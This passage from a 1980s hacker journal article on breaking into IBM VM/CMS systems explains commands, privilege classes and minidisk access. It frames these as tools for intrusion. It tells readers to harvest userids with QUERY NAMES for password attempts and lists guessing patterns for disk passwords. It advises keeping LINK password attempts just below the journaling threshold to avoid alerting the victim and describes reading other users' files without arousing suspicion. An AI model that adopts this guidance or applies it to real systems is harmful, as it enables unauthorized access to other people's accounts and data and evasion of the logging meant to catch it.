  2366. The VM/CMS system does not appear to limit the number of DIAL attempts a user
  2367. can make, unlike LOGON attempts. Programming your micro to search for a valid
  2368. line number to a system should work with no problem.
  2369.  
  2370. To drop the dialed connection just type RESET.
  2371.  
  2372. Error Messages:
  2373.  
  2374. "Line(s) not available on 'sysname'.": Either there are no lines allocated to
  2375. the system, or you must enter a correct line number.
  2376.  
  2377. "Invalid device type - 'sysname' 'line#': You have entered a valid system or
  2378. userid and line number, but the device you are on (the terminal) is invalid. In
  2379. this case, a GRAF (Graphics) device, system console or 3270 terminal may be the
  2380. only valid device.
  2381.  
  2382. "'userid' not logged on": The DIAL command cannot be executed unless the user
  2383. (or system) specified is logged on.
  2384.  
  2385. "'line#' does not exist": A valid userid/system has been entered but the line
  2386. number for that userid/system is not valid.
  2387.  
  2388.  
  2389. Message:
  2390.  
  2391. MSG is used to send messages to users who are currently logged on. This command
  2392. can be issued before (if specified by the logon menu) and after logging in.
  2393.  
  2394. MSG OPERATOR Help! I lost my password! My userid is COMOSOLO
  2395.  
  2396. This will send a message to the primary system operator of the system. If there
  2397. is only one CLASS A user online, the message will be sent to his terminal.
  2398.  
  2399. MSG *
  2400.  
  2401. This will send a message to yourself. This is useful for identifying the
  2402. current userid of an abandoned terminal.
  2403.  
  2404.  
  2405. Logoff:
  2406.  
  2407. The LOGOFF command can be abbreviated as LOG. After logging off you will
  2408. receive the following:
  2409.  
  2410. CONNECT= 00:33:54 VIRTCPU= 000:00.28 TOTCPU= 000:01.76
  2411. LOGOFF AT 17:05:44 EST THURSDAY 04/16/87
  2412.  
  2413. CONNECT is the actual clock time you spent while on the system.
  2414. VIRTCPU is the virtual CPU time that was used.
  2415. TOTCPU  is the total CPU time both virtual and overhead that was used.
  2416.  
  2417.  
  2418. The HOLD command will hold the connection allowing you to re-logon again
  2419. without having to re-dial the system.
  2420.  
  2421. .LOG HOLD
  2422.  
  2423.  
  2424. SECURITY SOFTWARE:
  2425. ------------------
  2426.  
  2427. There are various weaknesses within VM/CMS both internally and externally which
  2428. can be exploited. For this reason, various software security packages have been
  2429. written. There would not be a need for these in most cases if the people in
  2430. charge of system security knew what they were doing. Anyhow, these packages do
  2431. provide added security when properly implemented. The most commonly found are
  2432. VMSECURE and ACF2. TOP SECRET and RACF are others which are less common. These
  2433. packages are easily identified.
  2434.  
  2435. After entering a valid userid VMSECURE responds with:
  2436.  
  2437. VMXACI104R Enter logon password:
  2438.  **************************
  2439.  HHHHHHHHHHHHHHHHHHHHHHHHHH
  2440.  SSSSSSSSSSSSSSSSSSSSSSSSSS
  2441. .
  2442.  
  2443.  
  2444. One way to positively identify the use of VMSECURE is by using it as a userid.
  2445. If it is running it will be a valid userid, and who knows, you may even hack
  2446. the password.
  2447.  
  2448.  
  2449. After entering a bad password ACF2 (Access Control Faclity 2) responds with:
  2450.  
  2451. ACFV1012  PASSWORD NOT MATCHED
  2452. ACFV0044  ACF2, ENTER PASSWORD
  2453.  
  2454.  **************************
  2455.  HHHHHHHHHHHHHHHHHHHHHHHHHH
  2456.  SSSSSSSSSSSSSSSSSSSSSSSSSS
  2457. .
  2458.  
  2459. These packages provide information which SHOULD be inherent within the
  2460. Operating System itself. Perhaps newer versions of CMS will contain them. Some
  2461. of these features are:
  2462.  
  2463. * Last logon date/time
  2464. * Password expiration
  2465. * Rules for password selection
  2466. * Invalidating userids for invalid password attempts
  2467. * Invalidating terminals for invalid password attempts
  2468. * Shows users how many invalid password attempts have occured on their userid
  2469. * Increased file security
  2470.  
  2471.  
  2472. LOGGED ON:
  2473. ----------
  2474.  
  2475. After logging on you may receive something similar to the following:
  2476.  
  2477. DASD 190 LINKED R/O; R/W BY MAINT; R/O BY 030 USERS
  2478. LOGMSG - 10:40:25 EST FRIDAY 05/22/87
  2479. *********************************************************************
  2480. *            WELCOME TO MISCELLANEOUS COMPUTER SERVICES             *
  2481. *                              -VM1-                                *
  2482. * SYSTEM WILL BE DOWN FROM 10:00 TO 10:30 EST SUNDAY MAY 24, 1987   *
  2483. *********************************************************************
  2484. Logon at 13:22:59 EST FRIDAY 05/22/87
  2485. VM/SP REL 4 04/20/86 11:33
  2486.  
  2487. R; T=0.01/0.01 13:23:10
  2488. .
  2489.  
  2490. Line #1:  This line shows that the disk at virtual address 190 is linked with
  2491.           R/O access by you, R/W by userid MAINT and R/O by another 30 users.
  2492.  
  2493. Line #2:  This shows that the logon message was created at 10:40 on Friday.
  2494.  
  2495. Line #3-7:This is the message that is shown to all users of the system upon
  2496.           logging on. Some systems may not have one.
  2497.  
  2498. Line #8:  The actual time of logon is printed.
  2499.  
  2500. Line #9:  The current RELEASE of VM/SP and the time and date it was installed
  2501.           is shown.
  2502.  
  2503. Line #10: This is the ready message and it is printed after every command is
  2504.           performed where:
  2505.  
  2506. R= Ready  This indicates that the system is ready for input.
  2507. T= Time   The first series of numbers tells how long it took the system to
  2508.           perform the last task. The second set of numbers gives the time of
  2509.           day.
  2510.  
  2511.  
  2512.           If you do not receive the ready message you are in CP and must IPL
  2513.           CMS in order to issue CMS commands.
  2514.  
  2515. Line #11: The system prompt, you can now enter commands.
  2516.  
  2517.  
  2518. PRIVILEGE CLASSES:
  2519. ------------------
  2520.  
  2521. As with most other Operating Systems a user must have sufficient privileges in
  2522. order to execute certain commands. Every CP command belongs to one of eight IBM
  2523. defined privilege classes. The CP directory defines which users can use which
  2524. classes of commands. Each user has one or more privilege classes, as does each
  2525. CP command. If you try to issue a command that does not match the assigned
  2526. privilege class of the userid you are using, the system will not process the
  2527. command. As far as I know, no records of attempts to use privileged commands
  2528. are kept.
  2529.  
  2530.  
  2531. Class          User and Function
  2532. ---------------------------------
  2533.   A            Primary System Operator: The class A user has the ability to
  2534.                control the system. Any user who uses the VM/SP system console
  2535.                posseses this privilege class. This user can broadcast messages,
  2536.                control system accounting, and issue commands which affect the
  2537.                overall performance of the system.
  2538.  
  2539.   B            System Resource Operator: The class B user has the ability to
  2540.                control all the "real" resources of the system, except those
  2541.                controlled by the spooling and primary system operators.
  2542.  
  2543.   C            System Programmer: Class C users can modify real storage as
  2544.                opposed to virtual storage.
  2545.  
  2546.   D            Spooling Operator: The class D user controls spooling data
  2547.                files.
  2548.  
  2549.   E            System Analyst: Monitors and interprets system performance data.
  2550.  
  2551.   F            Service Representative: This class is usually given to accounts
  2552.                that IBM Field Service personnel use for updates and also for
  2553.                diagnosing system problems.
  2554.  
  2555.   G            General User:  Class G users are the most prominent on the
  2556.                system. This privilege allows the user to control functions
  2557.                associated with their own virtual machine.
  2558.  
  2559.   Any          The Any classification is given to certain CP commands which are
  2560.                available to any user. The commands are usually limited to Login
  2561.                and Logoff.
  2562.  
  2563.   H            Class H is reserved for IBM use.
  2564.  
  2565.  
  2566. Due to the individual needs of a site, privilege classes can be tailored to
  2567. suit the facility.  A total of up to 32 classes can be made. They would be
  2568. shown in the CP directory as A-Z and 1-6.
  2569.  
  2570. Typical Privilege Classes for a few common userids:
  2571.  
  2572. Userid:    P.C.
  2573. -------------------------
  2574. OPERATOR   A
  2575. EREP       F
  2576. OPERATNS   BCEG
  2577. MAINT      ABCDEFG
  2578.  
  2579.  
  2580.  
  2581. COMMANDS:
  2582. ---------
  2583.  
  2584. Commands are made up of command names, operands, and options.
  2585.  
  2586. Command Name: A command name is an alphanumeric symbol of up to 8 characters.
  2587.  
  2588. Operands: These specify the information on which the system operates when it
  2589. performs a command function.
  2590.  
  2591. Options: These keywords are used to control the execution of a command. When
  2592. used, they must be preceded by a left parentheses, but a closing one is not
  2593. necessary.
  2594.  
  2595. Different commands are used within different environments. To see which
  2596. environment you are in, simply hit return at the period prompt. You will
  2597. receive one of the following: CMS, CP, XEDIT.
  2598.  
  2599. There are many commands that are useful to both regular system users and
  2600. hackers. HELP is available on some systems, particularly on university systems.
  2601. It is extensive but not as clear as yes, UNIX or VMS which is typical of IBM.
  2602. Nevertheless, HELP is useful and you should get hardcopies of as many commands
  2603. as you can. AID is another form of HELP which may be useful to you in learning
  2604. more about the system.
  2605.  
  2606. One nice feature of CMS HELP is that when you receive an error message, you
  2607. can:
  2608.  
  2609. .HELP DMS000000 or DMK000000
  2610.  
  2611. Where DMS000000 or DMK000000 is the error message you have received. The system
  2612. will then explain what it is, why it happened and how you can correct it.
  2613.  
  2614. I am going to hold off on explaining any and all commands related to minidisks
  2615. until the next section. The others which I have found to be useful are as
  2616. follows.
  2617.  
  2618. You can issue any CP command while in CMS by precluding the command with CP.
  2619.  
  2620.  
  2621. QUERY
  2622.  
  2623. Query allows you to obtain various information about the system. A full list
  2624. can be found from using HELP.
  2625.  
  2626. One of the most important QUERY commands to the hacker is:
  2627.  
  2628. .Q NAMES
  2629.  
  2630. OPERATOR - 01F, SMART    - DSC, CMS0349  - B27, LOGO0180 - B31
  2631. VSM - VMVS1
  2632. SCOTT   -TP11WFM2, CMS1211 -TP11WF64, OPERATNS-TP11WFY1
  2633. R; T-0.01/0.01 11:34:28
  2634.  
  2635. There can be many users online, usually this list will contain from 30 to 100
  2636. users. The last user online was OPERATNS, since it was last in the list. The
  2637. SMART userid is DSC, or in a disconnected state. Usually a terminal will
  2638. remain disconnected for 15 to 30 minutes and then is totally logged off the
  2639. system. If you logon to an already disconnected terminal, the system will reply
  2640. with "RECONNECTED AT time". The other 2 userids on the same line as SMART are
  2641. probably connected terminals which are in a pre-logged in or pending logon
  2642. tate. VSM - VMVS1 is another system running parallel to (or under) CMS.
  2643.  
  2644. The QUERY NAMES command allows you to gain a little more security for yourself
  2645. on the system. It allows you to gain more valid usernames to attempt passwords
  2646. for in the unfortunate event that your current userid dies. Another use is that
  2647. you can start to compile your "common accounts" list of userids which are found
  2648. on VM/CMS systems. This list should get larger and larger as you gain access to
  2649. more and more systems and will allow you to gain access to more systems as it
  2650. gets larger.
  2651.  
  2652.  
  2653. If you can't count how many users are online from the Q NAMES list:
  2654.  
  2655. .Q USERS
  2656.  
  2657. 0007 USERS, 0000 DIALED, 0000 NET
  2658.  
  2659.  
  2660. If you didn't catch the logon message you can view it again by:
  2661.  
  2662. .Q LOGMSG
  2663.  
  2664.  
  2665. To see what release of CMS the system is:
  2666.  
  2667. .Q CMSLEVEL
  2668.  
  2669. VM/SP REL. 4, SERVICE LEVEL 417
  2670.  
  2671. If you are wondering which IBM mainframe CMS is running on, you can issue:
  2672.  
  2673. .Q CPUID
  2674. FF01472343810000
  2675.  
  2676. This can be interpreted as follows:
  2677.  
  2678. CPUID= aabbbbbbccccdddd
  2679.  
  2680. aa= "FF" when running VM/SP
  2681. bbbbbb= The processor ID number
  2682. cccc= The model number of the system. In the above case, CMS is running on
  2683.       an IBM 4381 system.
  2684. dddd= "0000" This is not used for CP.
  2685.  
  2686.  
  2687. SENDFILE allows you to send files within any minidisk that is currently
  2688. accessed by you to another user. Anytime you send a file an entry is made in
  2689. the file USERID NETLOG (where USERID is the user you are sending the file to).
  2690. This command is also used for sending NOTE files which can be created with an
  2691. editor and send to whomever as E-MAIL.
  2692.  
  2693. If you are tired of seeing a text listing, or have attempted to read a compiled
  2694. program and wish to exit or break out of it, simply hit a hard-break, and then
  2695. type HX. HX is for Halt eXecution. It will halt whatever you are doing and put
  2696. you back into the CMS environment. It may take a few lines of text after
  2697. entering it for the system to stop the process.
  2698.  
  2699.  
  2700.  
  2701.                              --- End of Part A ---
  2702.  
  2703.                           --- Attach Part B here ---
  2704.  
  2705.  
  2706. The LOD/H Technical Journal: File #9 of 10
  2707.  
  2708.  
  2709.                      Hacking IBM's VM/CMS Operating System
  2710.                                      PART B
  2711.  
  2712. Command Interpretation Chart: The following chart will compare the commands
  2713. used on VAX/VMS, UNIX, and VM/CMS to allow those who are familiar with the
  2714. other Operating Systems to quickly reference its CMS counterpart.
  2715.  
  2716. +-----------------+---------------+----------------------+--------------------+
  2717. ! VAX/VMS         ! UNIX          ! VM/CMS               ! SHORT EXPLANATION  !
  2718. +-----------------+---------------+----------------------+--------------------+
  2719. ! /NOCOMMAND      ! *****NONE**** ! NOIPL                ! aborts login pgm   !
  2720. +-----------------+---------------+----------------------+--------------------+
  2721. ! SHOW USERS      ! WHO           ! QUERY NAMES          ! online userlisting !
  2722. +-----------------+---------------+----------------------+--------------------+
  2723. ! DIRECTORY       ! LS            ! LISTFILE or FILELIST ! show current dir.  !
  2724. +-----------------+---------------+----------------------+--------------------+
  2725. ! TYPE filename   ! CAT filename  ! TYPE fname ftype fm  ! list or view files !
  2726. +-----------------+---------------+----------------------+--------------------+
  2727. ! EDIT            ! ED or VI or EX! XEDIT                ! system editor      !
  2728. +-----------------+---------------+----------------------+--------------------+
  2729. ! DELETE filename ! REMOVE filenme! ERASE fname ftype fm ! deletes files      !
  2730. +-----------------+---------------+----------------------+--------------------+
  2731. ! PHONE username  ! WRITE user    ! TELL userid          ! user communication !
  2732. +-----------------+---------------+----------------------+--------------------+
  2733. ! Control-Y       ! Ctrl-Backslash! Hard-break then HX   ! aborts process     !
  2734. +-----------------+---------------+----------------------+--------------------+
  2735.  
  2736. Corresponding files:
  2737.  
  2738. +-----------------+---------------+--------------+----------------------------+
  2739. ! SYSUAF.DAT      ! /ETC/PASSWD   ! USER DIRECT  ! Userlist & user information!
  2740. ! MAIL.TXT        ! USR/MAIL/user ! USERID NOTE  ! Electronic mail files      !
  2741. ! LOGIN.COM       ! .PROFILE      ! PROFILE EXEC ! User login command files   !
  2742. +---------------------------------+--------------+----------------------------+
  2743.  
  2744.  
  2745. Local Commands:
  2746. ---------------
  2747.  
  2748. Local commands are commands written for an individual system. They are
  2749. customized commands that suit a facilities' needs. These commands are execs
  2750. which are either not available from IBM or are cheaper to write on their
  2751. own. I will mention a few which may be found on other systems, as these are
  2752. rather common.
  2753.  
  2754. WHOIS
  2755.  
  2756. This command gives a little information about the users that you specify which
  2757. are on the system.
  2758.  
  2759. .WHOIS MAINT BACKUP MAILER BUBBA RELAY VMUTIL
  2760.  
  2761. Userid    Name
  2762. --------- ---------
  2763. MAINT     System Maintenance Account
  2764. BACKUP    VM System Backup and Recovery Machine
  2765. MAILER    BITNET Inter-Node Mail Processing Machine
  2766. BUBBA     Bubba B. Bonehead - Programmer/Analyst Extroadinaire
  2767. RELAY     BITNET Internet Chat Facility
  2768. VMUTIL    VM Utilization Statistics
  2769.  
  2770.  
  2771.  
  2772. SYSPASS
  2773. READPW
  2774. WRITEPW
  2775.  
  2776. In most cases, the only way to change a users' password is by having the system
  2777. operator or someone with high privileges do it. This is one reason why many
  2778. passwords remain the same for long periods of time. These programs allow users
  2779. to change their logon password, read access minidisk password and write access
  2780. minidisk password respectively. Perhaps you will find these or similar programs
  2781. on some systems.
  2782.  
  2783.  
  2784. Privileged Commands:
  2785. --------------------
  2786.  
  2787. As far as I know, there is no command to determine which privilege class the
  2788. userid you are abusing is. The only way is to check in the CP Directory for it.
  2789. The following are some privileged commands and what privilege class is needed
  2790. to run them. Again, as far as I know, the system keeps no records of failed
  2791. attempts at running privileged commands. Use of these commands are most likely
  2792. recorded, has a msg sent to the system console or both, especially when using
  2793. FORCE.
  2794.  
  2795.  
  2796. FORCE userid (Class A)
  2797.  
  2798. This command will forcibly log off the userid you specify. I really can see
  2799. no reason other than to be a total asshole for abusing this command.
  2800.  
  2801. DISABLE raddr (or) all  (Class A or B)
  2802.  
  2803. This is used to prevent specific terminals or all terminals from logging onto
  2804. the system. Again, there is no real reason to use this or most other privileged
  2805. commands for that matter unless you want to be kicked off of the machine. If
  2806. you do DISABLE a terminal, simply use ENABLE to repair the damage.
  2807.  
  2808. DETACH realaddr (FROM) whatever (Class B)
  2809.  
  2810. This is used to detach real devices from the system. These can be terminals,
  2811. printers, disk packs, tape drives, etc. You must know the real address of the
  2812. device, and 'whatever' can be the system, or a userid.
  2813.  
  2814. WARNING userid (or) operator or all (Class A or B)
  2815.  
  2816. Warning will send a priority message to a user, operator or all users on the
  2817. system. It will interrupt anything they happen to be doing. Obviously sending
  2818. a msg to all users stating they are BONEHEADS is not recommended.
  2819.  
  2820.  
  2821. MINIDISKS:
  2822. ----------
  2823.  
  2824. A minidisk is a subdivision of consecutive cylinders on a real DASD volume. The
  2825. SD device, is the actual disk the information is stored on. This can be
  2826. compared to a hard drive for an IBM PC. Before the drive can be used, it must
  2827. be formatted. Once formatted, it is divided up into directories which are
  2828. minidisks. Each minidisk is a number of cylinders which is the standard memory
  2829. storage unit. There can be many minidisks on a DASD.  Associated with each CMS
  2830. disk, is a file directory, which contains an entry for every CMS file on the
  2831. disk.  A minidisk can be defined for R/W or R/O access. It can also be used for
  2832. temporary or permanant storage of files. Each minidisk has a virtual address.
  2833. Virtual addresses can be from 001-5FF (hexidecimal) in basic control mode, and
  2834. 001-FFF in ECMODE (Extended Control Mode).
  2835.  
  2836. CMS minidisks can be accessed according to a letter of the alphabet (A-Z).  In
  2837. order to better explain this, lets assume we are logged onto a VM/CMS system
  2838. under the userid of JOE and we want to see what minidisks we have access to.
  2839. We use the QUERY SEARCH command to determine which disks we are ATTACHed to.
  2840.  
  2841. .Q SEARCH
  2842.  
  2843. JOE001  191  A    R/W
  2844. JOE002  192  D    R/O
  2845. CMS190  190  S    R/O
  2846. CMS19E  19E  Y/S  R/O
  2847.  
  2848.  
  2849. As can be seen each minidisk has a volume name, virtual address, filemode,
  2850. and access mode. The A disk is the default. Most accounts you gain access with
  2851. will have an A disk with a virtual address of 191. The S disk is the System
  2852. disk. This contains the files and programs for running the system. The same
  2853. goes for the Y disk. The D disk is another disk used by JOE.
  2854.  
  2855. You can view what each of these directories contains by issueing the LISTFILE
  2856. command.
  2857.  
  2858. .LISTF
  2859.  
  2860. BUBBA    NOTE     A1
  2861. MISC     WHATEVER A1
  2862. PROFILE  EXEC     A0
  2863.  
  2864.  
  2865. This is a list of files on the A disk. The first column is the Filename the
  2866. second is the Filetype and the third is the filemode. Filenames can be anything
  2867. you specify. Filetypes can also be anything you specify, but commonly follow a
  2868. pattern which tells what type of file it is. Filemodes are comprised of a
  2869. filemode letter (A-Z) and a filemode number (0-6).
  2870.  
  2871. Filenames can contain the following characters: A-Z  0-9  $  #  +  -  :    U
  2872.  
  2873. Here is an explanation of common filetypes:
  2874.  
  2875. Filetype ! Description
  2876. ---------+-------------
  2877. DATA     ! Data for programs or simply TYPE-able text.
  2878. EXEC     ! User written programs or IBM procedures written in REXX.
  2879. HELP     ! System HELP files.
  2880. HELPCMS  ! System HELP files.
  2881. LANGUAGE ! One of the langauges that the system supports, such as ASSEMBLE,
  2882.          ! COBOL, FORTRAN, JCL, REXX, PL1, SNOBALL, BINARY, ETC.
  2883. LISTING  ! Program source code listings
  2884. LOADLIB  ! Loading Library
  2885. MACLIB   ! Macro Library
  2886. MODULE   ! System commands
  2887. NETLOG   ! Contains a list of all files which have been SENT to other users.
  2888. NOTE     ! Similar to E-MAIL on other systems, a note sent from another user.
  2889. SOURCE   ! SOURCE code for various programs.
  2890. TEXT     ! Text file. Probably used for programs and when TYPEd yields little.
  2891. TXTLIB   ! Text Library
  2892. WHATEVER ! A nonstandard filetype which will probably be somewhat descriptive
  2893.          ! of its contents.
  2894. XEDIT    ! A file which was created using the XEDIT utility.
  2895.  
  2896.  
  2897. Both filenames and filetypes must not exceed 8 characters in length.
  2898.  
  2899.  
  2900. Filemodes:
  2901.  
  2902. Filemode numbers are classified as follows:
  2903.  
  2904. Filemode 0   There is little file security on VM/CMS.  This may be due to the
  2905.              fact that directory security is very good.  A file with a mode of
  2906.              zero makes that file invisible to other users unless they have
  2907.              Read/Write access to that disk.  When you LINK to someones' disk
  2908.              in Read/Only mode and get a directory listing, files with a mode
  2909.              of 0 will not be listed.
  2910.  
  2911. Filemode 1   This is the default filemode.  When reading or writing files, you
  2912.              do not have to specify a filemode letter of 1 (unless you want
  2913.              to) since it will default to it.
  2914.  
  2915. Filemode 2   This is basically the same as a filemode of 1.  It is mainly
  2916.              assigned to files which are shared by users who link to a common
  2917.              disk, like the system disk.
  2918.  
  2919. Filemode 3   Be careful when you see these!  These are erased after they have
  2920.              been read.  If a file with a mode of 3 is printed or read it will
  2921.              be erased.  Blindly reading files without paying attention to
  2922.              the filemode numbers can shorten your stay on the system.  The
  2923.              main reason for this filemode is for the files or programs which
  2924.              are unimportant or have one time use can be automatically deleted
  2925.              to keep disk space and maintenance to a minimum.
  2926.  
  2927. Filemode 4   This is used for files that are to simulate OS data sets. They are
  2928.              created by OS macros in programs running in CMS.  I have not found
  2929.              any files with this filemode, so for the time being, you should
  2930.              not be concerned about it.
  2931.  
  2932. Filemode 5   This is basically the same as filemode 1.  It is different in that
  2933.              its used for groups of files or programs.  It makes it easier for
  2934.              deleting files a user wants to keep for a certain period of time.
  2935.              You could just enter:
  2936.  
  2937.              ERASE * * A5
  2938.  
  2939.              Now all files on the A disk with a filemode of 5 will be deleted.
  2940.  
  2941. Filemode 6   Files with this mode are re-written back to disk in the same place
  2942.              which is called "update-in-place".  I have no idea why this would
  2943.              be specified, and have not found any files with a filemode of 6.
  2944.  
  2945.  
  2946. Filemode 7-9 These are reserved for IBM use.
  2947.  
  2948.  
  2949.  
  2950. Look back to our Q Search listing. If you want to see what is on the D disk:
  2951.  
  2952. .LISTF * * D
  2953.  
  2954. NOTMUCH ONHERE D1
  2955.  
  2956. In this case, the D disk only contains 1 file called NOTMUCH with a filetype of
  2957. ONHERE. But do not forget the fact that you only have Read/Only access to the
  2958. D minidisk! So there may or maynot be merely 1 file on the D disk. Remember all
  2959. filemodes of 0 (which in this case would be D0) are invisible to anyone who
  2960. does not posses Read/Write access.
  2961.  
  2962. You can access any disk that you are ATTACHed to by replacing the D in the
  2963. above example with the filemode letter (A-Z) you want to access. As was shown
  2964. previously, the QUERY SEARCH command will give you a list of minidisks that
  2965. your userid is attached to upon logging in. These command statements are
  2966. usually found in your PROFILE EXEC.
  2967.  
  2968.  
  2969. So you can access a few minidisks. There may be hundreds on the system. Unlike
  2970. UNIX and VMS, and most other Operating Systems for that matter you cannot issue
  2971. a command and some wildcard characters to view the contents of every users'
  2972. directory. In order to access another users' directory (minidisk) you must have
  2973. the following:
  2974.  
  2975. 1) The USERID of the person whose disk you wish to access.
  2976.  
  2977. 2) The virtual address(es) (CUU) that the USERID owns.
  2978.  
  2979. 3) The Read, Write, or Multi disk access password, depending on which
  2980.    access mode you wish to use.
  2981.  
  2982. This would be accomplished by the following:
  2983.  
  2984.  
  2985. .LINK TO BUBBA 191 AS 555 RR
  2986.  
  2987. Enter READ link password:
  2988.  *************************
  2989.  HHHHHHHHHHHHHHHHHHHHHHHHH
  2990.  SSSSSSSSSSSSSSSSSSSSSSSSS
  2991. .RBUBBA
  2992.  
  2993. R; T=0.01/0.01 21:58:48
  2994. .ACCESS 555 B
  2995.  
  2996. R; T=0.01/0.01 21:59:03
  2997. .Q SEARCH
  2998.  
  2999. JOE001  191  A    R/W
  3000. BUB001  555  B    R/O
  3001. JOE002  192  D    R/O
  3002. CMS190  190  S    R/O
  3003. CMS19E  19E  Y/S  R/O
  3004.  
  3005. .LISTF * * B
  3006.  
  3007. MISCFILE DATA     B1
  3008. PROFILE  EXEC     B1
  3009.  
  3010. .REL 555
  3011.  
  3012. R; T=0.01/0.01 22:02:01
  3013.  
  3014. Now an explanation for the events which have just occured.
  3015.  
  3016. The LINK command is used to access other users' minidisks. The format is:
  3017.  
  3018. .LINK (TO) USERID VADDR1 (AS) VADDR2 (MODE) ((PASS=)PASSWORD)
  3019.  
  3020. BUBBA is the USERID whose disk we wish to access.
  3021.  
  3022. VADDR1 is a virtual address which belongs to the BUBBA userid. If BUBBA was to
  3023. access our minidisk whose userid is JOE, he could access either our 191 address
  3024. or our 192 address. The 190 and 19E addresses are usually automatically
  3025. accessed by nearly all the users of the system since it contains system
  3026. commands. We are assuming that BUBBA indeed has a minidisk with the virtual
  3027. address of 191. Some userid's may not have any or they may have addresses which
  3028. are somewhat obscure, say of 13A or 503. The only way we would be able to
  3029. access those assuming BUBBA did not give them to us would be to guess them.
  3030. This would be rather difficult, timeconsuming, and dangerous as we will soon
  3031. see.
  3032.  
  3033. VADDR2 is any address which is not currently in our control, (ie. in our Q
  3034. Search which would be 190, 191, 192, 19E) and is in the range of 001 to 5FF in
  3035. Basic Control or FFF in Extended Control. In this example, we chose to use 555.
  3036. We could have easily used 104, 33F, 5FA, etc.
  3037.  
  3038. MODE is the access mode which consists of up to 2 letters. The first letter
  3039. specifies the Primary access mode. The second letter is optional and designates
  3040. the alternate access mode. If the primary mode is not available, the alternate
  3041. is used.
  3042.  
  3043. The access mode we used was RR. Valid access modes are:
  3044.  
  3045. R   Primary Read/Only access. This is the default. You can opt to not specify
  3046.     an access mode when linking to a users' disk, and this is the mode which is
  3047.     used. It will only work if no other links are in effect.
  3048.  
  3049. RR  This allows read access no matter what links are in effect to that users'
  3050.     disk.
  3051.  
  3052. W   Primary Write access. This is only good if no other links are in effect.
  3053.  
  3054. WR  If Write is available then the link will be made, if not it will goto Read.
  3055.  
  3056. M   Primary Multiple access.
  3057.  
  3058. MR  Resorts to Read if Multi is unavailabe.
  3059.  
  3060. MW  This garauntees write access no matter what.
  3061.  
  3062.  
  3063. If another user has write access to one of your disks when you log on, your
  3064. access will be forced to Read/Only. For this reason, you should have read
  3065. access to others disks instead of write. If you wish to see what files have a
  3066. filemode of zero, then link with write access, view or access those files, then
  3067. RELEASE the disk and re-access it via read to avoid suspicion by that user of
  3068. unauthorized individuals gaining write access to his files.
  3069.  
  3070. If a user has write access to a disk, you cannot gain write access unless you
  3071. use a mode of MW. It is not recommended to have write access to anothers' disk
  3072. if they themselves have write access. CMS cannot guarantee the integrity of
  3073. the data on a disk which has more than one person linked to it with write
  3074. access. Now if you see that the user is in a disconneced (DSC) state through
  3075. the Q NAMES command, then it shouldn't be a problem if you have write access
  3076. also since the person is not active. If that person re-connects however, then
  3077. it is advisable to RELEASE that disk as soon as possible to avoid any chance of
  3078. data being destoyed.
  3079.  
  3080. PASS=PASSWORD  like the logon password, it can be a 1-8 character string that
  3081. MUST match the access mode password for the VADDR1 of the userid which you are
  3082. attempting to gain access to. Up to three access mode passwords can exist for
  3083. each minidisk, R, W, and M.
  3084.  
  3085. If the installation uses the Password Suppression Facility, an INVALID FORMAT
  3086. message will be issued when you attempt to enter the password for a disk on the
  3087. same line as the LINK command was entered on. Obviously this is to prevent
  3088. people from 'spoofing' the password off the screen or from printouts found in
  3089. the trash. If this occurs, just hit return after entering the access mode, and
  3090. wait for the enter password response.
  3091.  
  3092. Every disk password along with every users password and other information is
  3093. contained in the CP Directory. If the password is "ALL" then a password is not
  3094. required for any user so you will not be asked for one. You will then recieve
  3095. a ready message indicating that the transaction has just been completed.
  3096.  
  3097. If you receive the message: "BUBBA 191 NOT LINKED; NO READ PASSWORD" then
  3098. within the CP Directory, there is no read password at all. This means that the
  3099. only way you can gain access to BUBBA's directory would be by getting his logon
  3100. password. One note, I believe that a users logon password cannot be any of his
  3101. access mode passwords. The reasons for this are obvious. If BUBBA wants JOE to
  3102. access a disk, then he can give JOE the corresponding disk password. If this
  3103. was identical to his logon password then JOE could logon as BUBBA and access
  3104. all BUBBA's disks with no problem, and at the same time posses all the privs
  3105. that BUBBA has. Within the CP directory, if there is no password entry for read
  3106. access then there are no entries for write nor multi. If there is no entry for
  3107. write then there may or may not be an entry for read, but definitly not one for
  3108. multi. And finally if there is no entry for multi then there may or may not be
  3109. entries for read and write.
  3110.  
  3111. The methods for obtaining disk access passwords are the same as anything else.
  3112. Common sense and "Password Psychology" come into account along with the element
  3113. of luck.
  3114.  
  3115. Assume the userid is VMTEST and you are hacking the READ password. Passwords
  3116. may be: RVMTEST, RVM, RTEST, RTESTVM. Others may be READ, READVM, VMREAD,
  3117. READTEST, TESTREAD and even VMTEST. Of course it could be something like: J2*Z5
  3118. Many times the same password will be used for R, W, and M access instead of
  3119. three separate passwords.
  3120.  
  3121. CP keeps track of unsuccessful LINK attempts due to invalid passwords. When you
  3122. exceed the maximum number of incorrect password attempts, which usually
  3123. defaults to 10, the link command will be disabled for the remainder of your
  3124. stay on the system. All you have to do is re-logon and you will have full use
  3125. of LINK again.
  3126.  
  3127. If the LOGON/AUTOLOG/LINK journaling facility is activated, unsuccessful link
  3128. attempts due to the above are recorded. When the threshold is reached the
  3129. userid whose password you are trying to hack is sent a message. Therefore, keep
  3130. track of the number of attempts you make and keep just short of the system
  3131. threshold.
  3132.  
  3133. After successfully linking to a users' disk, you must issue the ACCESS command
  3134. in order to get a directory listing or access any files on that disk. This is
  3135. accomplished by:
  3136.  
  3137. .ACCESS VADDR2 B
  3138.  
  3139. VADDR2 is the address after 'AS' in your link command line, and 'B' is the
  3140. filemode letter which you wish to access the disk as. This can be anything but
  3141. the letters which you have already assigned up to a total of 26 (A-Z).
  3142.  
  3143. After accessing the disk to your hearts content, you can then RELEASE it. When
  3144. you logoff the disk is automatically released. Releasing the disk is not
  3145. necessary unless you already are attached to 26 minidisks, and you want to
  3146. access more. You would then release whatever disks you wish and link then
  3147. access others. After releasing disks, and you want to re-access that disk, you
  3148. do not have to issue another link command but merely the ACCess command and
  3149. what filemode you wish it to be.
  3150.  
  3151. The QUERY DASD command will list the minidisks that most everyone on the system
  3152. has access to. All of these may or maynot be automatically accessed upon logon.
  3153. For this reason, you should issue it, then all you have to do is ACCess the
  3154. virtual address and define the filemode.
  3155.  
  3156. .Q DASD
  3157.  
  3158. DASD  190  3380  SYSRES  R/O   32 CYL
  3159. DASD  191  3380  SYSRES  R/W    1 CYL
  3160. DASD  192  3380  SYSRES  R/O    2 CYL
  3161. DASD  193  3380  SYSRES  R/O   19 CYL
  3162. DASD  194  3380  SYSRES  R/O   21 CYL
  3163. DASD  19E  3380  SYSRES  R/O   27 CYL
  3164.  
  3165. In our Q SEARCH list, we have access to 190 as the system disk, 191 as our A
